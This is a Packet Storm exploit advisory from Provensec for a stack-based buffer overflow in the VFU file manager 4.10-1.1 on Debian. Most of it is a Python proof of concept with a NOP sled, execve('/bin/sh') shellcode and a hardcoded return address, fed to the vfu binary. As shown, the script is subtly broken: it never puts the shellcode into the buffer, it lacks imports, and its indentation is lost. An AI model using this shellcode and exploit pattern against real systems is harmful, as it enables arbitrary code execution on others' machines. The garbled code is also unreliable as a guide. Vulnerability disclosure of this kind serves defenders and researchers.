VFU 4.10-1.1 Stack Buffer Overflow

2014-03-23T00:00:00
ID PACKETSTORM:125831
Type packetstorm
Reporter Provensec
Modified 2014-03-23T00:00:00

Description

                                        
                                            `# Author: Provensec http://www.provensec.com <advisories@provensec.com >  
# Tested on GNU/Linux - Debian Wheezy  
  
# Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow  
# vulnerability because the application fails to perform adequate  
# boundary-checks on user-supplied input.  
#  
# An attacker can exploit this issue to execute arbitrary code in the  
# context of the application. Failed exploit attempts will result in a  
# denial-of-service condition.  
#  
# Application vendor: VFU v4.10-1.1 ( Latest ) - http://cade.datamax.bg/vfu/  
# Download from: https://packages.debian.org/wheezy/vfu  
  
buffersize = 803  
nopsled = "\x90"  
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"  
eip = "\x10\xf0\xff\xbf"  
buffer = nopsled * (buffersize-len(shellcode)) + eip  
  
try:  
subprocess.call(["vfu", buffer])  
except OSError as e:  
if e.errno == os.errno.ENOENT:  
print "VFU not found!"  
else:  
print "Error executing exploit"  
raise  
  
`